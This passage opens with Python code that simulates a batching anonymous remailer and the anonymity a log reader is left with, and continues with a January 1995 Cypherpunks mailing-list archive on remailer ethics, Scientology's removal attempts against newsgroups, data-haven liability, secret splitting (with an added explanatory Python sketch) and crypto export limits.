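        # The host logs the arrival whether the operator wants it or not.
        self.syslog.append((now, "in", sender))
        self.pool.append((recipient, body))

    def flush(self, now):
        """Shuffle everything stored so far and send it out in one burst."""
        batch, self.pool = self.pool, []
        self.rng.shuffle(batch)
        for recipient, _body in batch:
            self.syslog.append((now, "out", recipient))
        return batch


def anonymity_set(syslog, recipient):
    """Senders a log reader cannot rule out for the first delivery to recipient.

    Deliveries sharing one timestamp are treated as one flush; every sender
    logged since the previous flush is a candidate for each of them.
    """
    pending, batch_time, candidates = [], None, []
    for when, direction, address in syslog:
        if direction == "in":
            pending.append(address)
            continue
        if when != batch_time:                     # first delivery of a new flush
            batch_time, candidates, pending = when, pending, []
        if address == recipient:
            return set(candidates)
    return set()


def demo(batch_size):
    """Run constructed traffic through the remailer, flushing every batch_size."""
    traffic = [  # constructed sample: (arrival time, sender, recipient)
        (100, "alice@example.org", "list@example.net"),
        (130, "bob@example.org", "carol@example.com"),
        (170, "dave@example.org", "erin@example.com"),
    ]
    remailer = BatchingRemailer()
    for when, sender, recipient in traffic:
        remailer.receive(when, sender, recipient, b"constructed body")
        if len(remailer.pool) >= batch_size:
            remailer.flush(when + 1)
    remailer.flush(600)                            # final timer-driven flush
    return anonymity_set(remailer.syslog, "list@example.net")


if __name__ == "__main__":
    print("forward immediately:", demo(1))
    print("batch of three:     ", demo(3))
```

With immediate forwarding the log pins the delivery on a single sender; with a batch of three, the same log leaves three candidates.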




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 17 Jan 95 03:01:38 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Scientologys Attempts
In-Reply-To: <9501161644.AA06046@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950117025818.2086B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 16 Jan 1995, Hadmut Danisch wrote:

> 
> I just had a view into the alt.religion.scientology and
> alt.clearing.technology newsgroups. There are some messages
> about a Scientology decision to shut down every internet traffic
> about Scientology. If the messages are true, Scientology sent 
> rmgroup Control messages to remove the groups. 
> 
> The request to stop the remailers seems to come from the
> same people...
> 
After reading the lawyer's threatening letter I tried to check out the 
two newsgroups mentioned, and was told they do not exist.  (This is not a 
local filter here; Eskimo does not censor newsgroups.)  So have they been 
deleted?  If so, by whom and how? What is 'rmgroup' and who has the 
authority to remove alt. groups?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 17 Jan 95 00:09:21 PST
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
Message-ID: <m0rU8z7-0002GdC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 11 Jan 1995, Samuel Kaplin wrote (about FBI interest in BlackNet)
> 
> > I hope they took you someplace nice for lunch...You might want to file a
> > FOI request on yourself, just to see how much they censor. ;) They might
> > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> 
> For the benefit of myself and the list, how would you go about doing that?

Also would be useful to know the equivalent procedures for Canada, UK, etc.

Filing such a request would probably get a file opened on you, too, but
so what?  The more these files fill up with innocent people the more
useless they get.  Perhaps everyone ought to sign up their granny to 
receive the Loompanics catalog or 2600, as a way to generate noise.

Regarding BlackNet, I am not sure that they are not *run* by the FBI,
or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
entity.  Such agencies must realize that traffic in secrets is possible,
inevitable, and would probably love to put themselves first in line to 
buy.  Think of the value:  embarrass rival agencies, identify leaks (if not
sources), raise funds for clandestine operations through resale or blackmail,
etc. Security agencies have often engaged in smuggling as a form of entrapment,
and/or fundraising;  Consider Iran-Contra as a recent high-level example.  The
mandate to trap offenders in a 'sting' also provides a handy alibi to excuse
such operations if they are ever exposed.  Citizens have no such protections.

Even a record of successful dealings with BlackNet would mean little.  If it
were run by, say, the Nuclear Non-Proliferation Commission, then presumably
it would purchase non-nuclear secrets at high prices to build up credibility.
When a nuclear secret was offered for sale it would spare no expense to find 
the source.  In fact the 'highest bidder' for a secret would often be the
embarrassed/enraged agency responsible for preventing its leak.  At the very
least such agencies could be expected to deal secretly with the BlackNets...
why search out a secret yourself if you can buy it on the 'open' market?

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 17 Jan 95 00:32:34 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501170829.AA10034@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael wrote:
> 	This entire discussion is completely unnecessary. There are ways 
> of removing operator liability without examining the submission at all.

Liability is a legal issue, not a technical one.
(Catchability is a technical issue.)
The basic ways to remove liability are to either run your system
where the local laws don't object to information storage,
or to reduce the operator's involvement to levels that the
local legal system will tolerate.  The former case is easy,
if you can rent computer space in a country with a non-meddling
government and good net access (or an easily rentable government :-).)
For those of us in the latter situation, the discussion's still
useful...

On Mon, 16 Jan 1995, Johnathan Corgan wrote:
> > It just occurred to me when reading this another method for ensuring
> > the "I can't tell what's in it" condition with a data haven operator.
> > Why not use a secret sharing system where the contraband data is 
> > split into a number of pieces and sent to different havens?

Good, but still has most of the same old risks.

Alice asks Dave's Data Haven to store stuff, and later retrieves it.
Dave doesn't want to be able to know what's in it.
There are three main threat periods - at receipt of the data,
during storage, and at retrieval.  Secret sharing is great for
the storage period, assuming the data havens are in different
jurisdictions and the cops can't force the operator (Dave)
to go retrieve all the pieces.  

However, at receipt of the data, it's all in one place, Dave's inbox.
If Alice encrypted it safely, or secret-shared it herself, great!
But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
or Alice's key has been compromised, anything in Dave's inbox is
still toast, even if anything that's been split and stored is safer
than if it had been stored unsplit.  So he either needs to split it fast,
shortening the window, or find a way to blind his mail before processing it,
or split it before reading it.

Splitting before reading isn't impossible in a stream environment.
Define a protocol that looks like SMTP, but opens up three outgoing 
streams as well as an incoming stream, and uses standard mail formats.
While reading the headers from Alice (either the real contents or just the
handshakes at the beginning), Dave's receiver thinks about them
and sends some meaningful headers to Moe, Larry, and Curly.
Once the message body starts, instead of storing the incoming bytes,
Dave sends every other byte to Moe or Larry, and the xors to Curly.*
If he wants to get fancy, he can even encrypt the data with a stream
cypher as he goes along, giving half the key to each of them.
That way, Dave's system really only has knowledge of the headers,
plus one line at a time of incriminating data on the fly.
And his partners can't give anything away either; they're just stooges.

* If the connections to and storage by Moe and Larry are reliable enough,
Curly doesn't really need to be involved, but the xor business lets
you reconstruct everything from just two parts.


			Bill
			
"Privacy is not a crime!"			
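
Added example (not part of the message above and not code from the list): a Python sketch of the byte-splitting scheme Bill describes, where even-position bytes go to Moe, odd-position bytes to Larry, and the XOR of each pair to Curly, so that any two shares rebuild the body. The class and function names, the zero-padding of an odd final byte, and the sample body are assumptions made for illustration; in-memory buffers stand in for the three outgoing streams.

```python
# Added illustration: streaming 2-of-3 split (Moe / Larry / Curly).
# Names, padding rule and sample data are assumptions, not from the original post.
from typing import Dict, Iterable, Optional

SAMPLE_BODY = b"Constructed sample message body.\r\nSecond line.\r\n"  # constructed


class StreamSplitter:
    """Splits a body as it arrives; holds at most one unpaired byte of state."""

    def __init__(self) -> None:
        self.moe = bytearray()     # even-position bytes
        self.larry = bytearray()   # odd-position bytes
        self.curly = bytearray()   # XOR of each (even, odd) pair
        self._pending: Optional[int] = None
        self.length = 0

    def feed(self, chunk: bytes) -> None:
        for b in chunk:
            self.length += 1
            if self._pending is None:
                self.moe.append(b)           # forwarded immediately
                self._pending = b            # remembered only until its partner arrives
            else:
                self.larry.append(b)
                self.curly.append(self._pending ^ b)
                self._pending = None

    def finish(self) -> Dict[str, object]:
        # Odd-length body: pair the last byte with an implicit zero.
        if self._pending is not None:
            self.curly.append(self._pending)
            self._pending = None
        return {"moe": bytes(self.moe), "larry": bytes(self.larry),
                "curly": bytes(self.curly), "length": self.length}


def split_stream(chunks: Iterable[bytes]) -> Dict[str, object]:
    """Feed network-sized chunks through the splitter and return the shares."""
    splitter = StreamSplitter()
    for chunk in chunks:
        splitter.feed(chunk)
    return splitter.finish()


def reconstruct(length: int, moe: Optional[bytes] = None,
                larry: Optional[bytes] = None,
                curly: Optional[bytes] = None) -> bytes:
    """Rebuild the body from any two shares plus the length carried in the headers."""
    if sum(s is not None for s in (moe, larry, curly)) < 2:
        raise ValueError("need any two of the three shares")
    n_even, n_odd = (length + 1) // 2, length // 2
    if moe is None:
        padded = larry + b"\x00" * (n_even - n_odd)
        moe = bytes(c ^ l for c, l in zip(curly, padded))
    elif larry is None:
        larry = bytes(m ^ c for m, c in zip(moe, curly))[:n_odd]
    out = bytearray(length)
    out[0::2] = moe[:n_even]
    out[1::2] = larry[:n_odd]
    return bytes(out)


def single_share_view(name: str, share: bytes, length: int) -> str:
    """What one share holder can read directly; '?' marks positions it cannot.

    Moe and Larry each hold half of the body verbatim, which is the gap the
    optional stream cipher in the message closes. Curly holds only pair XORs.
    """
    view = ["?"] * length
    if name == "moe":
        for i, b in enumerate(share[: (length + 1) // 2]):
            view[2 * i] = chr(b)
    elif name == "larry":
        for i, b in enumerate(share[: length // 2]):
            view[2 * i + 1] = chr(b)
    return "".join(view)


if __name__ == "__main__":
    # Simulate the body arriving in uneven chunks, as it would off a socket.
    shares = split_stream([SAMPLE_BODY[:7], SAMPLE_BODY[7:8], SAMPLE_BODY[8:]])
    n = shares["length"]
    print(reconstruct(n, larry=shares["larry"], curly=shares["curly"]) == SAMPLE_BODY)
    print(single_share_view("moe", shares["moe"], n))
```

The plain split is striping with parity rather than information-theoretic secret sharing: `single_share_view` shows that Moe or Larry alone reads every other byte of the body.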




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Tue, 17 Jan 95 06:32:57 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <ab417acf2a021003441c@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with any dang sense left at all knows that St. Jude is the secret
CypherGoddess behind this whole eff-in' thing, besides being the Patron
Saint of Hopeless Causes...    ;)

   dave
_________________________________________________________________________
"There are three sides to every issue: my side, your side and the side of
 the truth." -Babatunde Olatunji






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 17 Jan 95 09:00:09 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Scientologys Attempts
In-Reply-To: <9501171221.AA06681@elysion.iaks.ira.uka.de>
Message-ID: <Pine.3.89.9501170859.A3034-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Hadmut Danisch wrote:
> 
> > So have they been 
> > deleted?  If so, by whom and how? 
> 
> Find out...
> 
> 
> > What is 'rmgroup' and
> 
> The usenet method to remove groups. A special message
> with a control line in the header.
> 
> > who has the 
> > authority to remove alt. groups?

Anybody has the power.  Nobody has the authority.

It should be done only when there is a general consensus,
which is obviously not the case here.

This is a classic case of net abuse.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@prairienet.org>
Date: Tue, 17 Jan 95 07:46:34 PST
To: cypherpunks@toad.com
Subject: Re: Scientologys Attempts
In-Reply-To: <Pine.SUN.3.91.950117025818.2086B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501170901.E14013-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Charles Bell wrote:

> On Mon, 16 Jan 1995, Hadmut Danisch wrote:

> > I just had a view into the alt.religion.scientology and
> > alt.clearing.technology newsgroups. There are some messages
> > about a Scientology decision to shut down every internet traffic
> > about Scientology. If the messages are true, Scientology sent 
> > rmgroup Control messages to remove the groups. 
> > 
> > The request to stop the remailers seems to come from the
> > same people...

> After reading the lawyer's threatening letter I tried to check out the 
> two newsgroups mentioned, and was told they do not exist.  (This is not a 
> local filter here; Eskimo does not censor newsgroups.)  So have they been 
> deleted?  If so, by whom and how? What is 'rmgroup' and who has the 
> authority to remove alt. groups?

An 'rmgroup' is a control message used by Usenet when a group needs to be 
removed globally.  Etiquette suggests that only big, important people 
should send these out, but technically anyone can send one.

I followed the Scientology debate with little interest until yesterday, 
when I fired up my newsreader and was asked "Subscribe to new group 
alt.religion.scientology?"  At that point, I knew that the real war had 
begun. :-)

From what I was able to ascertain here, an rmgroup was sent out, followed 
soon after by a newgroup (or two or three or...).  My news server doesn't 
honor newgroups in the alt hierarchy automatically as a rule, but did so 
in this case for some reason.

News server: news.cso.uiuc.edu, on the University of Illinois 
Urbana-Champaign campus.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael L. Acklin" <hroller@metronet.com>
Date: Tue, 17 Jan 95 08:14:44 PST
To: cypherpunks@toad.com
Subject: Premail PGP Keys
Message-ID: <Pine.HPP.3.90.950117100723.13854A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Ralf,
	I hate to bother you, but I am setting up your premail program and 
tried the "premail -getkeys" but it never works. I tried to manually 
finger Matt's Pub Key area, but looks like he is down or has a different 
address. Is there somewhere else I can try to get the PGP Keys for the 
remailers, or does Matt have a different address? Any help would really 
be appreciated.
	Also does anyone have a patch for PINE 3.9X to get premail to work? 
I know I am kinda behind but just starting out and would really 
appreciate any help I can get. Again Thanks in Advance....


Mike Acklin   ----------------------> hroller@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 17 Jan 95 10:27:45 PST
To: cypherpunks@toad.com
Subject: Scientology and remailers.
Message-ID: <Pine.3.89.9501171023.A9769-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Posting the truth about Scientology, in the face of
harassment and threats by scientologists, is an
excellent example of the legitimate use of remailers,
as is alt.abuse.recovery, and talk.politics.china


 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 02:06:23 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <ab40e69a010210049530@[132.162.201.201]>
Message-ID: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



This thread illustrates (at least if setups like this are
worthy of a place in Raph's list) that penet.fi is the safest
way to go for the moment. I would just hate it to have my
head on the plate of a remailer operator who takes an interest
in subtle ethical discussion of whether to sell me out or not.

Mats
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Tue, 17 Jan 95 12:28:42 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: (none)
In-Reply-To: <Pine.HPP.3.91.950117193541.25204A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.88.9501171208.A21790-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Mats Bergstrom wrote:

> On Tue, 17 Jan 1995, Name withheld on request wrote:
> 
> > wonders to what end remailers are being put by people who are worried
> > about being "sold out".
> 
> The fundamental principle here is that an e-mail message is just so
> many bits of 1's and 0's. It can never, in its own capacity, steal,

I disagree, one can use e-mail to steal.  E-mail consumes resources,
resources which the sender may have no right to use.  If the sender
is sending messages which the recipient does not wish to receive then
his resources are being taken.  If the recipient has no way of stopping
the messages then the recipient's resources are being taken against the
recipient's will and the recipient should be able to have the messages
stopped before they consume the recipient's resources.

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficiently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Jan 95 09:53:02 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <199501171752.MAA21698@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 anonymous-remailer@xs4all.nl (Name withheld on request)
said: 
 
>This comment is grossly unfair.  Obviously Homer is going to a lot of
>effort to operate his remailer in the best way possible.
>
>It's easy for others to be critical.  "head on a plate" is a strong term
>to use, given Homer made it clear he would not reveal the identity of an
>anonymous user without a court order.  Also, one wonders to what end
>remailers are being put by people who are worried about being "sold out".
>
>It's always been a good policy to use a foreign mailer in a chain where
>anonymity is critically important.  That doesn't mean it's OK to make
>Homer the whipping boy.
 
 
I agree that it's a bit much to expect the remailer operator to heroically
perform beyond what any of us would do in the same lonely spot under
duress. 
 
Tim has written recently on another list that the USG grabs enemies in
other domains when the national interests are at stake -- the 800-pounder
can define any of its actions legal, or to hell with legal niceties as the
Beast opts, the picky lawyers can sort it out later, or never. 
 
Does not Duncan and others have wisdom on this:  Don't roll over out of
ignorance and faint-heartedness, but do carefully protect your keister,
with feet-on-ground planning, mercury-technology and out-wits.  Watch for
signs of sneak attack through the guy being squeezed next door, or by a
cahoots-machine zipping psy-war toot-alarms to foster fearful quiescence. 
 
Some warning examples may be in the offing in the rising heat of dreaded
horse-threats to civil society.  If so, some will be arranged by
provocateurs like past G-guy tricks. 
 
So it goes.  So what.  Nesta said, it's fun to lance swollen infected
over-controlling heads.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 17 Jan 95 04:23:00 PST
To: quester@eskimo.com
Subject: Re: Scientologys Attempts
Message-ID: <9501171221.AA06681@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> After reading the lawyer's threatening letter I tried to check out the 
> two newsgroups mentioned, and was told they do not exist.  (This is not a 
> local filter here; Eskimo does not censor newsgroups.)  

They still exist at our local server (E.I.S.S., University of Karlsruhe,
Germany) and contain messages (even from America). Seems as they were
successful in deleting the group at some servers.



> So have they been 
> deleted?  If so, by whom and how? 

Find out...


> What is 'rmgroup' and

The usenet method to remove groups. A special message
with a control line in the header.

> who has the 
> authority to remove alt. groups?

Don't know...

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 17 Jan 95 13:28:41 PST
To: cypherpunks@toad.com
Subject: Re: Does encrypted equal safe?
In-Reply-To: <m0rU6g1-000kfxC@mill2.millcomm.com>
Message-ID: <199501172128.NAA06955@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: marko@millcomm.com (Mark Oeltjenbruns)

   >If you can't read it, it's not kiddie-porn *for you*, although it
   >might be for someone with the key.
   >
   So the fact that it's not kiddie-porn *for me* makes it safe *for me*
   to be transporting or storing for others that know it is kiddie-porn?

Do you want it to be, or not?

This is exactly the situation I was talking about when I emphasized
the need for a positive rhetoric.  We have here a situation for which
I see the need for a clear statement of position and persuasive
arguments in its favor.

The law gets created by discussion.  If we as a group fail to
articulate our positions, these positions won't be represented and,
failing other advocates (who?), will have no place in the law.  Legal
support of privacy technology will be necessary for its long term
acceptance.

The structure of the argument quoted below is primarily that of "this
can't be right".  I can only infer advocacy that operators of privacy
services must be primarily responsible for content.  This is to say
one of several things, none of which I desire.  It is to say privacy
service operators who don't know content and who don't know identity
should not exist, because no sane person would take upon themselves
the liability of the world.  It is alternately to say that privacy
service operators must know content and filter it.  It is alternately
to say that such operators must know identity and be able to transfer
liability, and these last two are not mutually exclusive.

If you don't want this situation, speak up now.  I desire the approved
existence of privacy services which offer true privacy and as
completely ignorant as possible operators of them.

   >Encryption fragments meaning subjectively.  A magazine, for example,
   >has a fixed center of meaning for all who can read the language.  A
   >magazine looks the same to all who look at it.  An encrypted file
   >looks different to those who have the key from those who do not.
   
   But why does the meaning of the data assume to change?

Because I want it to.

Meaning is subjective.  If I see encrypted text, am I to be held
responsible for having seen through an encryption for which I hold not
the key?  Merely because someone knows a transformation into a
disapproved form does not mean that I do.

   If I take my stack of kiddie-porn and put it in a box with a big
   strong lock on it, in a way physically encrypting it, change the
   meaning of what I have?

Ask your local postal or parcel service.  Is your local letter carrier
responsible for the possession of kiddie porn while walking around
with the mail in their sack?  I certainly hope not.  That would be a
ludicrous situation.

More accurately, it would be an outrage.  Pushing responsibility for
interpretation, the ascertaining of meaning, onto people who transport
and store either physical goods or information would be to require
them to become deputies in enforcement.  The policeman inside indeed!
No one is required to love the State nor its dictates.

   >Encrypted data is fundamentally different from paper-and-ink data in
   >this way.  The metaphor of "planting it on somebody" does not apply to
   >data that the "somebody" can't read.

   It is fundamentally a different process, but does that make it
   different from the locking the physical data in a box as above?

It is identical in its removal of any knowledge of content from the
state of mind of the holder.

What is different is that encrypted data is even more clear in its
removal of knowledge.  With a physical container, the boundary of the
container can be breached.  With a crypto container, it is impossible.

   It seems to me that what you are saying is that because the data is
   in a form that I can't understand, I'm safe from trouble.  Now it seems to
   me that this is not all that different from changing the form or appearance
   of physical data and saying I'm not responsible for it.  

If you personally enclose a physical object, you haven't removed your
own state of knowledge about the contents.  But if you give the
package to someone else, they don't know the contents.  Even when the
package changes hands, the state of knowledge doesn't.

The War on Certain Drugs has had the unfortunate effect of stretching
the imputations of knowledge to holders of Certain Drugs.  If a single
person denies a state of knowledge, yet has physical possession of
some Certain Drug, a court may assume that the possessor is lying.

And the fact that certain situations like this have been legislated
badly makes them no less totalitarian.

On the other hand, someone in the business of taking packages from
many different people can reasonably argue that they have no specific
knowledge of the contents of any of them.

   Now think of a remailer:  If somebody gave me this box of stuff,
   stuff that I had no idea of what it was since it was *locked up*, to
   transport over to location X and I got busted half way there am I safe?

I'll consider this a reasonable argument if you can show that some
analogous delivery service has been busted in this way.  And not all
delivery services are common carriers.

   Can I say that even though someone is using me to
   spam or distribute kiddie porn, I have no reason to try and stop it since I
   don't know what they are doing?  

I can tell from this situation that you yourself wouldn't feel
comfortable running a remailer.  So don't do that.  I see you're
already not doing that; good.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 17 Jan 95 13:30:48 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501172130.NAA06966@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@scruznet.com>

   It just occurred to me when reading this another method for ensuring the
   "I can't tell what's in it" condition with a data haven operator.  Why not
   use a secret sharing system where the contraband data is split into a number
   of pieces and sent to different havens?
   [...]
   Ok, Eric, go ahead and blast your holes in this argument :)

How do you know that what you the operator of the storage service gets
was generated by secret sharing?

The suggestion of having certificates that say "I encrypted this" is
interesting, but merely transfer the problem onto that signer.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 17 Jan 95 10:48:34 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <ab41c1b306021004669b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


>This thread illustrates (at least if setups like this are
>worthy of a place in Raph's list) that penet.fi is the safest
>way to go for the moment. I would just hate it to have my
>head on the plate of a remailer operator who takes an interest
>in subtle ethical discussion of whether to sell me out or not.

If you chain it through 3 or 4 remailers with PGP, then pretty much all 3
or 4 of them have got to decide to sell you out.  I trust Julf a lot, but
I'm not sure I trust him four times as much as every other remailer
operator.  Or something like that.

You can also probably use penet as a link on your larger chain, although
I've never tried this to see how it works.

And I would note that the "subtle ethical discussion" seemed to consist of
the operator trying to figure out what he should do in the future about
this sort of thing, and he never even seemed to consider turning over the
name of the anon user.  Although he did acknowledge that in the future he
might, or might work with other operators to try and discover a True Name.
*shrug*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Tue, 17 Jan 95 14:20:54 PST
To: cypherpunks@toad.com
Subject: pgp.el, as shown at the last PhysMeet
Message-ID: <12096.790381237@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


At this weekend's Physical Meeting, I demonstrated pgp.el, an
interface to PGP for use from GNU Emacs.  As I mentioned, this
package is available from the standard Emacs lisp archives and
other places.  However, the version I showed is advanced beyond
those sites, most notably in the use of color to highlight
various PGP messages, and in the "transparent decryption"
feature that I talked about the most.

If you'd like to look over this latest version, you can snarf it
from:

	       ftp.sgi.com:private/pgp-el.tar.gz

This version is still under test and development (notably, I
want to get the transparency working for rmail as well as mh-e,
and for sending as well as receiving).  Because it's not
finished yet, I've put it in the private/ directory, which is
protected against browsing.  When that's all finished, I'll be
publishing it again in the usual places.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Tue, 17 Jan 95 12:27:23 PST
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <9501172027.AA24378@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom wrote:
>On Tue, 17 Jan 1995, Name withheld on request wrote:
>
>> wonders to what end remailers are being put by people who are worried
>> about being "sold out".
>
>The fundamental principle here is that an e-mail message is just so
>many bits of 1's and 0's. It can never, in its own capacity, steal,
>molest or kill. It is therefore not unethical to run a no-log 'fortress
>remailer' and auto-delete ALL complaints, without exception. It might
>not be feasible to do so if one wants to stay out of jail, but hope-
>fully this will change with the rapid increase in country domains
>and the soon-to-come digicash market. Discussions of programming to
>make fortress remailers work and to make them easily exportable to
>African Linux-boxes are interesting. So are discussions of expected
>repercussions on society. Ethical discussions of what is abuse or not
>are better left to the clergy.

Here comes the clergy! :-)

I'm sure that when your hypothetical remailer comes up and I decide to spam
you with your own words (now I wouldn't do that, now would I? ;-), your
sysadmin will be comforted by knowing that it's only ones and zeros filling
his hard disk.  He would be especially comforted if I spammed
postmaster@wherever.you.are rather than your own account in a move to
protect your own anonymity.

Advocating a remailer such as you describe is only possible in a world where
anonymity is considered the supreme good, a goal to achieve no matter how
many other ethical rules we break.  In the real world, however, there will
always be problems with "acceptable use" and "abuse", along with the
additional problems with establishing policy and so on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 17 Jan 95 14:42:53 PST
To: P.vanMossel@telecom.ptt.nl
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
Message-ID: <9501172240.AA05908@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <3fh5m0$7tg@hdxu03.telecom.ptt.nl>, you write:
> In article <marca-1201952123120001@boulanger.mcom.com>, marca@mcom.com 
> says...
> >
> >There's no question that 40-bit is less than one would prefer.
> >This is why we are/will be supporting 128-bit RC4, for example,
> >in US-only products, honoring United States government export
> >restrictions.
> 
> Marc, isn't it possible (legally) to deliver products with a replaceable 
> encryption library (dll). Delivery with a 40-bit key DLL. The user has 
> the option to install a dll with a different keysize. Somewhat like 
> winsock...
> 
> Yes, I've seen the article suggesting a foreign office. I think an open 
> interface would do good for the whole field. I.e. ftp, telnet, etc. as 
> well.

Actually, it's probably worse than you think:

There are govt's out there that won't let you import code that is
"encryption ready". You must prove that your software is tamper proof
before it can be imported, and tamper proofing means that you can't
bolt on security. Also, I believe the export laws disallow "plug in"
security in the US...

The crypto legal world sucks.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@xs4all.nl (Name withheld on request)
Date: Tue, 17 Jan 95 06:07:01 PST
To: cypherpunks@toad.com
Subject: (none)Re: Abuse and Remailer Ethics
In-Reply-To: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
Message-ID: <199501171405.AA17997@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>,
Mats Bergstrom <asgaard@sos.sll.se> wrote:
> 
> This thread illustrates (at least if setups like this are
> worthy of a place in Raph's list) that penet.fi is the safest
> way to go for the moment. I would just hate it to have my
> head on the plate of a remailer operator who takes an interest
> in subtle ethical discussion of whether to sell me out or not.
> 
> Mats
>  
> 
This comment is grossly unfair.  Obviously Homer is going to a lot of
effort to operate his remailer in the best way possible.  

It's easy for others to be critical.  "head on a plate" is a strong
term to use, given Homer made it clear he would not reveal the
identity of an anonymous user without a court order.  Also, one
wonders to what end remailers are being put by people who are worried
about being "sold out".

